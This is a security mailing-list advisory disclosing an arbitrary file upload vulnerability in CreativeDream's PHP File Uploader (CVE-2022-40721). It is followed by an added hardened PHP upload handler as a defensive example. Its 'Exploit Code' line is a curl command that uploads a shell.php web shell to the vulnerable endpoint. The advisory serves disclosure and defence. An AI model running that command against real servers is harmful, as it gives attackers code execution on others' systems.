oss-sec mailing list archives
CreativeDream software arbitrary file upload
From: Larry Cashdollar <larry0 () me com>
Date: Mon, 3 Oct 2022 12:17:43 -0400
Title: CreativeDream software arbitrary file upload
Author: Larry W. Cashdollar
Date: 2022-09-08
CVE-ID:[CVE-2022-40721]
Download Site: https://github.com/CreativeDream
Vendor: CreativeDream
Vendor Notified: 2020-02-19
Vendor Contact: yuliangagarin [at] mail.ru
References: https://github.com/CreativeDream/php-uploader/issues/23
Advisory: http://www.vapidlabs.com/advisory.php?v=216

Description: PHP File Uploader is an easy to use, hi-performance File Upload Script which allows you to upload/download files to webserver.

Vulnerability: The software allows executable file uploads to the web root directory.

Exploit Code:
• curl -vk http://localhost/php-uploader/examples/upload.php -F "files=@shell.php"
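
A hardened upload handler for the condition named in the Vulnerability field, as an added example that is not part of the advisory and is not php-uploader's code. The storage path, the allowlist and the function name store_upload() are assumptions, and it covers only the single-file "files" form field used in the request above.

```php
<?php
// Added example, not php-uploader code. UPLOAD_DIR, ALLOWED and store_upload() are assumed names.
declare(strict_types=1);

const UPLOAD_DIR = '/var/app-data/uploads';   // assumption: a directory outside the web root
const ALLOWED = [                              // extension => MIME type the bytes must match
    'jpg' => 'image/jpeg',
    'png' => 'image/png',
    'pdf' => 'application/pdf',
];

function store_upload(array $file): string
{
    // Also rejects the multi-file (files[]) shape, where 'error' is an array.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    // Only accept a temp file that PHP itself received as an HTTP upload.
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }
    // The client-supplied name is read only for its final extension.
    $ext = strtolower(pathinfo((string) $file['name'], PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED)) {
        throw new RuntimeException('extension not allowed');   // .php and the like stop here
    }
    // Type is taken from the file's bytes, not from the request's Content-Type.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== ALLOWED[$ext]) {
        throw new RuntimeException('content does not match extension');
    }
    // Server-generated name: no client-controlled path or name reaches the disk.
    $dest = UPLOAD_DIR . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0640);   // never executable
    return basename($dest);
}

if (isset($_FILES['files'])) {
    try {
        echo store_upload($_FILES['files']);
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo 'rejected';
    }
}
```

If uploads must stay under the web root, the web server should additionally be configured not to execute scripts in that directory.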